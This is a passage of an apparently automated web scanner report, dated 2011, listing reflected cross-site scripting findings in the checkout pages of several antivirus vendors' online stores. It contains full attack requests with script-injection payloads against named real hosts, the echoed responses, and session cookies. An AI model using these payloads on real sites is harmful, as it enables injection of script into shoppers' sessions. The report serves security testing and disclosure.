Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 41946

<html>
<head>

<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
<meta http-equiv=
...[SNIP]...
<a class="order__link order__homepage__link" href='http://www.escanav.com/mwscnew/index.asp?cu/964cf\'><script>alert(1)</script>bddb008a6fb=USD'>
...[SNIP]...

1.12. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.avangate.com
Path:	/order/cart.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89ceb"><script>alert(1)</script>4d8bccc25b0455427 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89ceb\"><script>alert(1)</script>4d8bccc25b0455427 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /order/cart.php?CART_ID=6666fe17f2bc324cd19f55da68f/89ceb"><script>alert(1)</script>4d8bccc25b04554275a44b&qty0=1&prod0=4020750&submit_type=cross_selling&coupon=&Update=true&Checkout=true&Update=true HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://secure.avangate.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.avangate.com/order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eq6ds2k5q5c1ls2c0kr4fbb3k8g7kgn4; GKD=%95%DB%AC%E2%A0%BC%90%BA%92%A9%B3%DA%BD%C2%A0%9A%90%AE%99%B9%95%CE%BD%D5%A0%CF%8D%A9%92%96%9A%CA%B0%9D%9C%98%90%BB%9E%AB%97%B5%C6%A8

Response (redirected)

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:35:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=6666fe17f2bc324cd19f55da68f/89ceb\"><script>alert(1)</script>4d8bccc25b04554275a44b" target="_blank">
...[SNIP]...

1.13. https://secure.avangate.com/order/checkout.php [CART_ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.avangate.com
Path:	/order/checkout.php

Issue detail

The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d878"><script>alert(1)</script>27b37f62572 was submitted in the CART_ID parameter. This input was echoed as 5d878\"><script>alert(1)</script>27b37f62572 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=6666fe17f2bc324cd19f55da68f5a44b5d878"><script>alert(1)</script>27b37f62572 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.avangate.com/order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eq6ds2k5q5c1ls2c0kr4fbb3k8g7kgn4; GKD=%95%DB%AC%E2%A0%BC%90%BA%92%A9%B3%DA%BD%C2%A0%9A%90%AE%99%B9%95%CE%BD%D5%A0%CF%8D%A9%92%96%9A%CA%B0%9D%9C%98%90%BB%9E%AB%97%B5%C6%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:33:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=6666fe17f2bc324cd19f55da68f5a44b5d878\"><script>alert(1)</script>27b37f62572" target="_blank">
...[SNIP]...

1.14. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.avangate.com
Path:	/order/checkout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe14"><script>alert(1)</script>67ad459a50d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as abe14\"><script>alert(1)</script>67ad459a50d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=6666fe17f2bc324cd19f55da68f5/abe14"><script>alert(1)</script>67ad459a50da44b HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.avangate.com/order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eq6ds2k5q5c1ls2c0kr4fbb3k8g7kgn4; GKD=%95%DB%AC%E2%A0%BC%90%BA%92%A9%B3%DA%BD%C2%A0%9A%90%AE%99%B9%95%CE%BD%D5%A0%CF%8D%A9%92%96%9A%CA%B0%9D%9C%98%90%BB%9E%AB%97%B5%C6%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:33:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=6666fe17f2bc324cd19f55da68f5/abe14\"><script>alert(1)</script>67ad459a50da44b" target="_blank">
...[SNIP]...

1.15. https://secure.element5.com/esales/checkout.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.element5.com
Path:	/esales/checkout.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3998b"style%3d"x%3aexpression(alert(1))"cc6aa44df2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3998b"style="x:expression(alert(1))"cc6aa44df2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /esales/checkout.html?sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933&productid=300417896&quickbuy=1&3998b"style%3d"x%3aexpression(alert(1))"cc6aa44df2c=1 HTTP/1.1
Host: secure.element5.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://esd.element5.com/product.html?productid=300417896&backlink=http%3A%2F%2Fwww.trustport.com%2Fen&cookies=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessioncookie=2028757849%3Add1d7f168ffac04c5e1f4c172f9fd933

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:53:05 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 77098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>TrustPort, a.s. - eStore</title>
<style type="text/css">

...[SNIP]...
<form action="/esales/checkout.html?quickbuy=1&3998b"style="x:expression(alert(1))"cc6aa44df2c=1&sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933&sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933" method="post">
...[SNIP]...

1.16. https://secure.element5.com/esales/product.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.element5.com
Path:	/esales/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98fcd"style%3d"x%3aexpression(alert(1))"84730791e81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98fcd"style="x:expression(alert(1))"84730791e81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /esales/product.html?productid=300417896&sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933&98fcd"style%3d"x%3aexpression(alert(1))"84730791e81=1 HTTP/1.1
Host: secure.element5.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.element5.com/esales/checkout.html?sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933&productid=300417896&quickbuy=1&js=-1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessioncookie=2028757849%3Add1d7f168ffac04c5e1f4c172f9fd933

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:50:36 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 28580

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>TrustPort, a.s. - eStore</title>
<style type="text/css">

...[SNIP]...
<form action="/esales/product.html?productid=300417896&98fcd"style="x:expression(alert(1))"84730791e81=1&sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933&sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933" method="post">
...[SNIP]...

1.17. https://secure.k7computing.com/esales/checkout.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.k7computing.com
Path:	/esales/checkout.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d45"style%3d"x%3aexpression(alert(1))"64c433f0ffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0d45"style="x:expression(alert(1))"64c433f0ffb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /esales/checkout.html?PRODUCT[300456844]=1&js=-1&a0d45"style%3d"x%3aexpression(alert(1))"64c433f0ffb=1 HTTP/1.1
Host: secure.k7computing.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.k7computing.com/en/Online-Store/Buy-Antivirus-Software-from-K7-Computing.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=230062854.39582605.1319387171.1319387171.1319387171.1; __utmb=230062854.2.10.1319387171; __utmc=230062854; __utmz=230062854.1319387171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:30:53 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 150805

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>K7 Product Store - K7 Antivirus and Internet Security - K7 Computing</title>
<style type="text/css">
<!--
/*Hauptel
...[SNIP]...
<form action="/esales/checkout.html?js=-1&a0d45"style="x:expression(alert(1))"64c433f0ffb=1&sessionid=2028752510&random=76838fa6a12ef8c7a83b81052767d7f8&sessionid=2028752510&random=76838fa6a12ef8c7a83b81052767d7f8" method="post">
...[SNIP]...

1.18. https://secure.k7computing.com/esales/faxorder.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.k7computing.com
Path:	/esales/faxorder.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c58b9"style%3d"x%3aexpression(alert(1))"b2652687fe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c58b9"style="x:expression(alert(1))"b2652687fe1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /esales/faxorder.html?sessionid=2028751322&random=3e8d2fae8b0c88f58ce09fac2795cb78&c58b9"style%3d"x%3aexpression(alert(1))"b2652687fe1=1 HTTP/1.1
Host: secure.k7computing.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.k7computing.com/esales/checkout.html?PRODUCT[300456844]=1&js=-1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=230062854.39582605.1319387171.1319387171.1319387171.1; __utmb=230062854.2.10.1319387171; __utmc=230062854; __utmz=230062854.1319387171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerp-dc5-e5-moonlight-sol-01=1124205834.20480.0000

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:33:46 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 55158

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>K7 Product Store - K7 Antivirus and Internet Security - K7 Computing</title>
<style type="text/css">
<!--
/*Hauptel
...[SNIP]...
<form action="/esales/faxorder.html?c58b9"style="x:expression(alert(1))"b2652687fe1=1&sessionid=2028751322&random=3e8d2fae8b0c88f58ce09fac2795cb78&sessionid=2028751322&random=3e8d2fae8b0c88f58ce09fac2795cb78" method="post">
...[SNIP]...

1.19. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._COUNTRY parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The value of the profile._COUNTRY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9bb0'%3balert(1)//5d1463e55f1 was submitted in the profile._COUNTRY parameter. This input was echoed as e9bb0';alert(1)//5d1463e55f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387375122-217440&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=USe9bb0'%3balert(1)//5d1463e55f1&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=TT_PROMO_BANNER_SHOWN&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40&exp=show HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1886
Date: Sun, 23 Oct 2011 16:32:17 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('TT_PROMO_BANNER_SHOWN',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-de
...[SNIP]...

...[SNIP]...

1.20. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPC parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The value of the profile._IPC request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eaf74'%3balert(1)//28c1bcc212f was submitted in the profile._IPC parameter. This input was echoed as eaf74';alert(1)//28c1bcc212f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=eaf74'%3balert(1)//28c1bcc212f&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:15 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...

...[SNIP]...

1.21. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPD parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The value of the profile._IPD request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8246'%3balert(1)//7fd190a3b78 was submitted in the profile._IPD parameter. This input was echoed as d8246';alert(1)//7fd190a3b78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantecd8246'%3balert(1)//7fd190a3b78&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:20 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...

...[SNIP]...

1.22. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPF parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The value of the profile._IPF request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6117c'%3balert(1)//71fc5cb571a was submitted in the profile._IPF parameter. This input was echoed as 6117c';alert(1)//71fc5cb571a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=6117c'%3balert(1)//71fc5cb571a&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:17 GMT
Server: Test & Target

